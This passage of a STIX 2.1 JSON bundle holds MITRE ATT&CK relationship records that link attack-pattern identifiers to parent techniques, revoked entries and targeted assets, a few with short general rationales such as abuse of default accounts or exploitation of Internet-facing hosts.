"2020-03-27T21:13:45.236Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade", "target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0c72593d-fcc6-4023-8771-bed5e243310e", "created": "2023-09-28T21:24:37.417Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:24:37.417Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0cab29c6-d196-47b0-8621-10ac3c8a95d8", "created": "2023-09-28T19:51:27.775Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:51:27.775Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0d06a9f1-fc35-4f35-a628-3515b0686747", "created": "2020-01-31T12:42:44.324Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611", "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0d2d9b59-a152-4280-ac57-ce5416cbbe61", "created": "2020-02-11T18:40:00.043Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc", "target_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0d52eea3-394e-492b-944b-9ccb6348329d", "created": "2023-09-28T21:14:41.633Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:14:41.633Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0d8e0324-ba8e-4712-a123-60377afe94da", "created": "2023-09-29T18:48:17.073Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:48:17.073Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0dbf48f3-4579-4ca2-aceb-19d3e0449136", "created": "2023-09-29T17:57:12.010Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:57:12.010Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0e191d66-fe38-4f28-ad82-6922bd6bcc81", "created": "2024-04-09T20:58:17.933Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-04-09T20:58:17.933Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0e263b73-a033-4fac-9d6d-076ab8f8b954", "created": "2023-09-29T16:27:50.949Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:27:50.949Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0e4407b6-fa67-48a7-97c5-f0bff5112912", "created": "2020-03-20T19:53:25.794Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--02fefddc-fb1b-423f-a76b-7552dd211d4d", "target_ref": "attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0ea6c4e4-fedd-4fd9-a5fc-c07e3fb0f2a5", "created": "2020-10-02T14:57:16.081Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156", "target_ref": "attack-pattern--5282dd9a-d26d-4e16-88b7-7c0f4553daf4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0ec0af54-0182-4ad4-9b0e-4542a822de7f", "created": "2022-09-30T18:50:14.500Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-09-30T18:50:14.500Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1", "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0ef1e408-8ebb-4b28-b619-02914b7bae29", "created": "2023-09-29T17:57:34.378Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:57:34.378Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0f057592-54cb-4e99-9369-55ea6ba0e5e6", "created": "2024-05-22T13:01:50.268Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-22T15:10:30.054Z", "description": "Asset Mapping Rationale: Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.", "relationship_type": "targets", "source_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0f2d1c8b-4fb7-41e7-8def-36123060e5ae", "created": "2020-03-14T23:29:54.243Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--1ce03c65-5946-4ac9-9d4d-66db87e024bd", "target_ref": "attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0f5295ce-d705-4541-8dda-c569b126d103", "created": "2023-10-02T20:24:03.723Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-10-02T20:24:03.723Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e", "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0f5710a7-f015-40b8-ad3d-f281699f2b72", "created": "2023-09-29T17:09:11.210Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:09:11.210Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0fee6145-185d-417f-a431-201a5b3e3259", "created": "2024-03-29T12:38:17.884Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-03-29T12:38:17.884Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--0d91b3c0-5e50-47c3-949a-2a796f04d144", "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--106530e1-375a-4ac4-befb-8297b3b05610", "created": "2023-09-29T18:55:58.199Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-05-23T21:21:51.135Z", "description": "Asset Mapping Rationale: Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend in with normal network activity, to avoid more detailed inspection. They may use the protocol associated with the port, or a completely different protocol.", "relationship_type": "targets", "source_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--10ee09db-e80d-4022-8810-7bba70b33609", "created": "2020-10-19T19:03:52.121Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--3a40f208-a9c1-4efa-a598-4003c3681fb8", "target_ref": "attack-pattern--1f9012ef-1e10-4e48-915e-e03563435fe8", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--10fdc4f4-9f50-40d8-94db-966fcc434a14", "created": "2020-02-10T20:47:10.180Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--e51137a5-1cdc-499e-911a-abaedaa5ac86", "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1125875e-691d-40a8-91f8-14c6f6bd43b9", "created": "2024-05-22T17:27:02.071Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-23T21:50:22.964Z", "description": "Asset Mapping Rationale: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", "relationship_type": "targets", "source_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--116191ae-f163-4d6e-9a79-d07a68d1388b", "created": "2024-05-22T15:12:57.562Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-22T15:13:23.730Z", "description": "Asset Mapping Rationale: Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices.", "relationship_type": "targets", "source_ref": "attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--11840b30-f0d1-4df5-a960-cdb80749c32a", "created": "2023-09-29T17:07:25.209Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:07:25.209Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--11a82651-4d69-4738-89c6-17d0243cbbb0", "created": "2023-09-29T17:37:26.536Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:37:26.536Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--11f8631f-9475-4910-baa6-975eb776798a", "created": "2022-03-24T19:30:57.194Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-05-24T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--59ff91cd-1430-4075-8563-e6f15f4f9ff5", "target_ref": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--12043603-b490-41fc-84ed-99e70ca4876c", "created": "2020-03-13T21:01:23.208Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--dc27c2ec-c5f9-4228-ba57-d67b590bda93", "target_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--121c5fd3-dc71-4f45-b6dc-4b20a0bde300", "created": "2020-02-21T20:56:06.727Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", "target_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--126f9334-8b0c-4948-a495-07e2b5a7744a", "created": "2020-02-05T20:11:13.145Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--9e80ddfb-ce32-4961-a778-ca6a10cfae72", "target_ref": "attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--128de3f9-df58-4122-9523-0ac65a6ebf71", "created": "2023-09-29T17:45:20.237Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:45:20.237Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--12d6fc4f-bf06-4146-a387-4cb86f0f44a4", "created": "2023-09-28T21:13:23.057Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:13:23.057Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--12fdacea-28f7-4113-ae67-0b19e1ab5e36", "created": "2023-09-28T19:39:58.335Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:39:58.335Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1313b6ce-f09b-4747-abd9-0220293d60f3", "created": "2020-03-09T14:29:52.142Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--13fade18-6f60-40c6-bf34-0ef97424a4ce", "created": "2024-05-20T17:52:00.696Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-22T15:21:45.850Z", "description": "Asset Mapping Rationale: Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface", "relationship_type": "targets", "source_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1429cd78-4e2a-4898-a7d8-d01a0c465bd6", "created": "2023-10-02T20:24:12.666Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-10-02T20:24:12.666Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0fe075d5-beac-4d02-b93e-0f874997db72", "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--144f6ce7-d2b2-4a76-85d2-251191a0d2cc", "created": "2023-09-29T16:32:33.078Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:32:33.078Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--14a0804b-1b76-43e1-8fe5-96962b1da942", "created": "2020-01-15T16:25:22.518Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211", "target_ref": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": 